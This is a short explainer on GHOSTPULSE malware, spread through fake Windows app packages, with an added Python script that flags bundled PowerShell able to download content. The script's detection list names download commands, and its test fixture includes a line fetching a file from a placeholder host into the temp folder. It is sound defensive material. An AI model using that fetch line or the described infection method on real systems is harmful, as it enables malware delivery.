Hackers are using fake Windows app packages to spread a new type of malware called GHOSTPULSE. The fake packages impersonate popular software such as Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex.
The hackers trick people into downloading the fake Windows app packages through several methods, such as compromised websites, fake search results, and malicious ads. When someone opens the fake package, a Windows prompt asks them to click the “Install” button. If they do, a hidden PowerShell script downloads the GHOSTPULSE malware onto their computer from a remote server.
GHOSTPULSE is a type of malware that helps other malware start running on a system. It does this by using process doppelgänging, which creates a fake copy of a legitimate Windows process and loads the malware into that process.
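Because the download step described above is carried out by a PowerShell script that ships with the package, a package can be inspected before anyone clicks “Install”. The following is an added example, not code from the original article: it assumes the package is an MSIX/AppX file (a ZIP archive), and the indicator list, function names and sample package are constructed for illustration.

```python
import io
import re
import zipfile

# Download-capable PowerShell constructs worth a closer look (illustrative list).
DOWNLOAD_PATTERNS = {
    "Invoke-WebRequest": re.compile(r"\b(Invoke-WebRequest|iwr)\b", re.I),
    "Invoke-RestMethod": re.compile(r"\b(Invoke-RestMethod|irm)\b", re.I),
    "WebClient": re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
    "BITS": re.compile(r"\bStart-BitsTransfer\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def decode_script(raw: bytes) -> str:
    """PowerShell files are often UTF-16 with a BOM; otherwise treat as UTF-8."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")


def triage_package(package_bytes: bytes) -> list:
    """Return one finding per bundled .ps1 script that can fetch remote content."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.lower().endswith(".ps1"):
                continue
            text = decode_script(pkg.read(name))
            hits = sorted(k for k, rx in DOWNLOAD_PATTERNS.items() if rx.search(text))
            if hits:
                findings.append({"script": name, "indicators": hits,
                                 "urls": URL_RE.findall(text)})
    return findings


def build_sample_package() -> bytes:
    """Constructed sample: a package-shaped ZIP with one plain and one flagged script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AppxManifest.xml", "<Package/>")
        z.writestr("scripts/cleanup.ps1", "Remove-Item $env:TEMP\\*.log")
        fetch = "Invoke-WebRequest -Uri 'https://example.invalid/a.bin' -OutFile $env:TEMP\\a.bin"
        z.writestr("scripts/setup.ps1", fetch.encode("utf-16"))  # UTF-16 with BOM
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_package(build_sample_package()):
        print(finding)
```

A finding is a reason to review the script by hand, not a verdict: legitimate installers also fetch content, and a script can hide its download call from simple pattern matching.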